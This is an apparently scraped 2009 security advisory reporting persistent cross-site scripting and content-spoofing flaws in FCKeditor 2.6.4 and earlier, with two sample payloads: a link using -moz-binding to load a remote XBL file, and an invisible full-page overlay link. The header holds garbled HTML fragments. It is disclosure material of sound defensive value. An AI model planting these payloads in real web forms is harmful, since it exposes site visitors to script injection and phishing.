test Th...">XSS and Content Spoofing vulnerabilities in FCKeditor - vulnerability database | Vulners.comtest Th...">test Th...">test Th...">
Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22491
HistorySep 22, 2009 - 12:00 a.m.

XSS and Content Spoofing vulnerabilities in FCKeditor

2009-09-2200:00:00
vulners.com
9

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in FCKeditor.

XSS:

This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style.

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss&#39;&#41;&quot;&gt;test&lt;/a&gt;

This vulnerability works in Mozilla and Firefox (before Firefox 3.0).

Content Spoofing:

This is Persistent Content Spoofing vulnerability.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

These vulnerabilities are in editor itself. So they can be used at any site, which use FCKeditor as editor of web forms.

Vulnerable are FCKeditor 2.6.4 (and 2.6.4.1 must be too) and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3300/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua